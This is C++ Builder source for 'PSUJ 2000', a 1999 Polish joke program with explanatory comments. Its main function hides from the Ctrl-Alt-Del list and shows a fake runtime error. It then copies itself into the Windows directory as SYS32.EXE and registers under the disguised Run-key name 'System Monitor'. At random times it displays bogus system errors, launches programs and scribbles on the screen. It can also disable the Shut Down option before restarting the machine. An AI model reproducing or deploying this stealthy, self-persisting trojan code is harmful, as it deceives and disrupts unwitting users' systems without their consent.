// PSUJ 2000 v.1.0.1 (C) 1999 McKiler (mck@zg.home.pl)
// Freeware. Moesz rozprowadza program/kody rdowe bez ogranicze pod warunkiem
// niemodyfikowania archiwum. Nie moesz wykorzystywa tych kodw rdowych jako
// podstawa do swojego wasnego programu bez zezwolenia autora programu.
// Autor nie ponosi adnej odpowiedzialnoci za uywanie programu.
// Program pochodzi ze strony Joke Zone - http://msjokezone.cjb.net
//---------------------------------------------------------------------------
#include <vcl\vcl.h>
#include <process.h>
#include <stdlib.h>
#pragma hdrstop

#include "Unit1.h"
#include "Details.h"
//---------------------------------------------------------------------------
#pragma resource "*.dfm"
TForm1 *Form1;
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
	: TForm(Owner)
{
   // wywoanie funkcji ukrywajcej program pod CTRL-ALT-DEL
   hKernelLib = LoadLibrary("kernel32.dll");
   if(hKernelLib)
   {
      RegisterServiceProcess = (pRegFunction)GetProcAddress(hKernelLib, "RegisterServiceProcess");
      if(RegisterServiceProcess)
         RegisterServiceProcess(GetCurrentProcessId(), 1);
   }
}
//---------------------------------------------------------------------------
__fastcall TForm1::~TForm1()
{
   // Destruktor formy
   if(hKernelLib)
   {
      if(RegisterServiceProcess)
         RegisterServiceProcess(GetCurrentProcessId(), 0);
      FreeLibrary(hKernelLib);
   }
}
//---------------------------------------------------------------------------
void __fastcall TForm1::FormCreate(TObject *Sender)
{
   // Funkcje wywoywane przy starcie programu

   Application->OnRestore = AppRestore;
   ActionCount = -1;

   BufferSize = GetWindowsDirectory(NULL,0); // obliczanie cieki programu w katalogu Windows
   WinDir.SetLength(BufferSize+1);
   GetWindowsDirectory(WinDir.c_str(),BufferSize+1);
   strcpy(Dir1,WinDir.c_str());
   Dir1[BufferSize-1] = '\\';
   Dir1[BufferSize] = 'S';
   Dir1[BufferSize+1] = 'Y';
   Dir1[BufferSize+2] = 'S';
   Dir1[BufferSize+3] = '3';
   Dir1[BufferSize+4] = '2';
   Dir1[BufferSize+5] = '.';
   Dir1[BufferSize+6] = 'E';
   Dir1[BufferSize+7] = 'X';
   Dir1[BufferSize+8] = 'E';
   Dir1[BufferSize+9] = '\0';

   AnsiString IFREMOVE = ParamStr(1);
   if (IFREMOVE == "-remove") // sprawd czy zostao wydane polecenie deinstalacji
   {
      int q = MessageBox(0,"Are you sure you want to uninstall PSUJ 2000?","PSUJ 2000",MB_YESNO | MB_ICONQUESTION);
      if (q == 6) // Nacinito przycisk TAK
      {
         // UNINSTALL
         unsigned char wypis[4];
         bool del1 = true;
         for (int i = 0; i<4; i++) wypis[i] = 00;
         TRegistry& regKey=*new TRegistry();
         regKey.RootKey = HKEY_CURRENT_USER;
         regKey.OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
         regKey.WriteBinaryData("NoClose", wypis, 4);
         regKey.CloseKey();
         regKey.RootKey = HKEY_LOCAL_MACHINE;
         regKey.OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",false);
         if (regKey.ValueExists("System Monitor")) regKey.DeleteValue("System Monitor");
         delete &regKey;
         if (FileExist(Dir1)) // jeli istnieje plik %WINDIR%\SYS32.EXE
         {
            if (!DeleteFile(Dir1)) // jeli nie mona skasowa pliku %WINDIR%\SYS32.EXE
            {
               MessageBox(0,"Please restart and then manually delete file SYS32.EXE located in your Windows directory\n(HARD RESET is suggested NOW)","Uninstall",0);
               del1 = false;
            }
         }
         if (del1) MessageBox(0,"Application uninstalled succesfully (HARD RESET is suggested NOW)","Uninstall",0);
         Application->Terminate(); // koniec dziaania programu, gdy wszystkie funkcje (UNINSTALL) zostay ju wykonane
      }
   }
   else
   { // zostanie wykonane gdy:
     // a) program nie jest aktualnie aktywny (nie jest uruchomiona druga kopia)
     // b) nie zostao wywoane polecenie deinstalacji programu
     // te warunki zostay sprawdzone w pliku psuj.cpp
      if (ParamStr(0) != Dir1)
      {  // zostanie wykonane gdy: c) program jest uruchamiany nie z katalogu Windows (czyli nie przy starcie systemu)
         MessageBox(0,"Runtime error -1","Borland C++",MB_ICONSTOP); // fake message

         AnsiString tmp1 = ParamStr(0); // te merdania poniej maj na celu wycignicie ze stringu samej nazwy pliku z ktrego uruchamiana jest aplikacja
         char tmp2[100];
         strcpy(tmp2,tmp1.c_str()); // tmp1 jest typu AnsiString a funkcja strcpy pozwala m.in. na konwersj do char[]
         char File1[30]; // w File1 znajdzie si sama nazwa pliku *.EXE
         int tmplength = strlen(tmp2); // pobierz dugo penej cieki uruchomieniowej pliku
         int lastslash; // ostatni backslash w nazwie, czyli ten tu przed nazw *.EXE
         for (int i = tmplength-1; i > 0; i--)
         {
            if (tmp2[i] == '\\')
            {
               lastslash = i; // i oznacza numer znaku w tablicy tmp2[], ktry zawiera ostatni znak \ w acuchu
               break;
            }
         }
         for (int i = lastslash+1; i < tmplength; i++)
         {
            File1[i-lastslash-1] = tmp2[i]; // kopiujemy nazw pliku z acucha zawierajcego pen ciek do nowego acucha, ktry po wykonaniu ptli bdzie zawiera sam nazw *.EXE
         }
         File1[tmplength-lastslash-1] = '\0'; // na wszelki wypadek zapisz znacznik koca acucha po nazwie pliku
//         Label1->Caption = AnsiString(Dir1); // diagnostyka
         CopyFile(File1,Dir1,FALSE); // Skopiuj plik programu do katalogu Windows, funkcja CopyFile naley do WinAPI (wicej info w win32.hlp)
         TRegistry& regKey=*new TRegistry();
         regKey.TRegistry::RootKey = HKEY_LOCAL_MACHINE;
         regKey.OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",false);
         regKey.WriteString("System Monitor", Dir1); // Zapisz polecenie uruchomienia do rejestru
         delete &regKey; // poniej odpalamy program z katalogu Windows, przy okazji koczc aktualny program
         if (execlp(Dir1,Dir1,NULL) == -1) MessageBox(0,"Failed to execute","ERROR",0);
      }
      else Timer1->Enabled = true; // rozpocznij machin destrukcji :-)
   }                               // jeeli program jest uruchomiony z katalogu Windows
}
//---------------------------------------------------------------------------
void __fastcall TForm1::AppRestore(TObject *Sender)
{  // przy prbie wywoania funkcji Application->Restore() zostanie schowana ikona na pasku zada, ktra ma zwyczaj przy Restore si pokazywa
   ShowWindow(Application->Handle, SW_HIDE);
}
//---------------------------------------------------------------------------
void __fastcall TForm1::Timer1Timer(TObject *Sender)
{
   // Zdarzenie OnTimer, wywoywane co (Timer1->Interval) sekund, w tym programie co 10 sekund
   ActionCount++; // inkrementacja zmiennej ActionCount
  // Label1->Caption = AnsiString(ActionCount); // diagnostyka
   switch(ActionCount)
   {
      case 0 :
      {
         randomize(); // zmiana wartoci tablicy uywanej przez funkcj random()
//         Application->MainForm->Visible = true; // DIAGNOSTYKA
//         Application->Restore(); // DIAGNOSTYKA
         Timer1->Interval = 10000;
         break;
      }
      case 1 :
      {
         ActionCount = random(180) + 2; // rnicujemy czas midzy wywoaniami Akcji programu, 60 przebiegw to 10 minut dziaania programu         break;                        // +2 zapewnia nam to e nie dostaniemy liczby 0 lub 1, pod ktre mamy podoone konkretne dziaania
         break;
      }
      case 260 : // zostanie wykonane po czasie zalenym od losowania, bdzie to midzy 13 min a 43 min.
      {
         Numer = random(17); // losujemy, ktra Akcja ma by wykonana
//         Label1->Caption = "AKCJA : " + AnsiString(Numer); // diagnostyka
         break;
      }
      case 261 :
      {
         Timer1->Enabled = false;
         WykonajAkcje(Numer); // wywoujemy funkcj, ktra wykona wylosowan akcj
         Timer1->Enabled = true;
         ActionCount = 0; // resetujemy licznik
         break;
      }
      default :
      {
         // pole default waciwie nie jest nam potrzebne, ale niech ju bdzie
      }
   }
}
//---------------------------------------------------------------------------
bool __fastcall TForm1::FileExist ( LPSTR lpszFileName )
{  // funkcja sprawdza czy dany parametrem plik istnieje
   OFSTRUCT of;
   return (OpenFile(lpszFileName,&of,OF_EXIST) != HFILE_ERROR);
}
// --------------------------------------------------------------------------
long __fastcall TForm1::FileSize ( LPSTR lpszFileName )
{  // funkcja zwraca wielko pliku danego parametrem
   OFSTRUCT of;
   DWORD dwSize;
   HANDLE hFile;
   if ( OpenFile(lpszFileName,&of,OF_EXIST) == HFILE_ERROR )
      return 0;
   hFile = (HANDLE)OpenFile(lpszFileName,&of, GENERIC_READ );
   dwSize = GetFileSize ( hFile, NULL ) ;
   _lclose( (HFILE)hFile );
   if (dwSize == 0xFFFFFFFF)
      return 0;
   return (long )( dwSize );
}
// --------------------------------------------------------------------------
void __fastcall TForm1::WykonajAkcje (int NrAkcji)
{
   switch(NrAkcji)
   {
      case 0 :
      {
         MessageBox(0,"","",MB_ICONWARNING);
         break;
      }
      case 1 :
      {
         MessageBox(0,"Not enough memory","System error",MB_ICONWARNING);
         break;
      }
      case 2 :
      {
         MessageBox(0,"Windows was unable to write data to registry.\nPlease report this error to the computer vendor.","System error",MB_ICONWARNING);
         break;
      }
      case 3 :
      {
         MessageBox(0,"DISK I/O ERROR - cannot write to drive C","ERROR",MB_ICONSTOP);
         break;
      }
      case 4 :
      {
         MessageBox(0,"Unknown error","ERROR",MB_ICONSTOP);
         break;
      }
      case 5 :
      {
         MessageBox(0,"System resources critical! Please restart immediately.","System error",MB_ICONSTOP);
         break;
      }
      case 6 :
      {
         MessageBox(0,"System registry is corrupted. Run Windows Setup to fix this problem.","System error",MB_ICONSTOP);
         break;
      }
      case 7 : // symulujemy zwis Eplorera zdefiniowany w Form2
      {
         Form2->Height = 125;
         Form2->Button2->Enabled = true;
         Form2->ShowModal();
         break;
      }
      case 8 :
      {
         spawnlp(P_NOWAITO,"NOTEPAD.EXE","NOTEPAD.EXE",NULL);
         break;
      }
      case 9 :
      {
         spawnlp(P_NOWAITO,"EXPLORER.EXE","EXPLORER.EXE",NULL);
         break;
      }
      case 10 :
      {
         spawnlp(P_NOWAITO,"SCANDSKW.EXE","SCANDSKW.EXE",NULL);
         break;
      }
      case 11 :
      {
         spawnlp(P_NOWAITO,"COMMAND.COM","COMMAND.COM",NULL);
         break;
      }
      case 12 :
      {
         spawnlp(P_NOWAITO,"DEFRAG.EXE","DEFRAG.EXE",NULL);
         break;
      }
      case 13 :
      {
         spawnlp(P_NOWAITO,"MPLAYER.EXE","MPLAYER.EXE",NULL);
         break;
      }
      case 14 : // zamalujemy ekran na szaro, wystarczy jednak poruszy okienkiem aby przywrci pierwotny wygld
      {
         HDC dc = GetDC(0);
         Graphics::TCanvas *ScreenCanvas = new Graphics::TCanvas;
         ScreenCanvas->Handle = dc;
         ScreenCanvas->Pen->Width = 900;
         ScreenCanvas->Pen->Color = clGray;
         ScreenCanvas->MoveTo(400,0);
         ScreenCanvas->LineTo(400,Screen->Height);
         ScreenCanvas->MoveTo(Screen->Width - 400,0);
         ScreenCanvas->LineTo(Screen->Width - 400,Screen->Height);
         delete ScreenCanvas;
         ReleaseDC(NULL,dc);
         break;
      }
      case 15 : // jedyna pseudo-destrukcyjna akcja w programie, wyczenie moliwoci zrestartowania systemu !!!
      {
         int q = MessageBox(0,"Your system MUST be restarted in order to apply changes you've made.\nDo you want to do it now (stongly recommended) ?","Warning",MB_YESNO | MB_ICONWARNING);
         if (q == 6) // zostanie jednak wywoana tylko po potwierdzeniu przez uytkownika (przycisk TAK)
         {
            unsigned char wpis[4];
            wpis[0] = 01;
            for (int i = 1; i<4; i++) wpis[i] = 00;
            TRegistry& regKey=*new TRegistry();
            regKey.OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
            regKey.WriteBinaryData("NoClose", wpis, 4);
            delete &regKey;
            ExitWindowsEx(EWX_SHUTDOWN, 0); // restartujemy Windows, zamykajc po kolei wszystkie aplikacje (nie jest to restart natychmiastowy, a przez to dane w programach nie zostan utracone)
         }
         break;
      }
      case 16 : // narysujemy czerowny krzyyk na ekranie
      {
         HDC dc = GetDC(0);
         Graphics::TCanvas *ScreenCanvas = new Graphics::TCanvas;
         ScreenCanvas->Handle = dc;
         ScreenCanvas->Pen->Width = 10;
         ScreenCanvas->Pen->Color = clRed;
         ScreenCanvas->MoveTo(0,0);
         ScreenCanvas->LineTo(Screen->Width,Screen->Height);
         ScreenCanvas->MoveTo(Screen->Width,0);
         ScreenCanvas->LineTo(0,Screen->Height);
         delete ScreenCanvas;
         ReleaseDC(NULL,dc);
         break;
      }
      default : // ta akcja nie ma prawa wystpi, jednak dla celw diagnostycznych mona zdefiniowa wywietlenie komunikatu
      {
         MessageBox(0,"Timer error !!!!!","SYS32",0);
      }
   }
}
// --------------------------------------------------------------------------

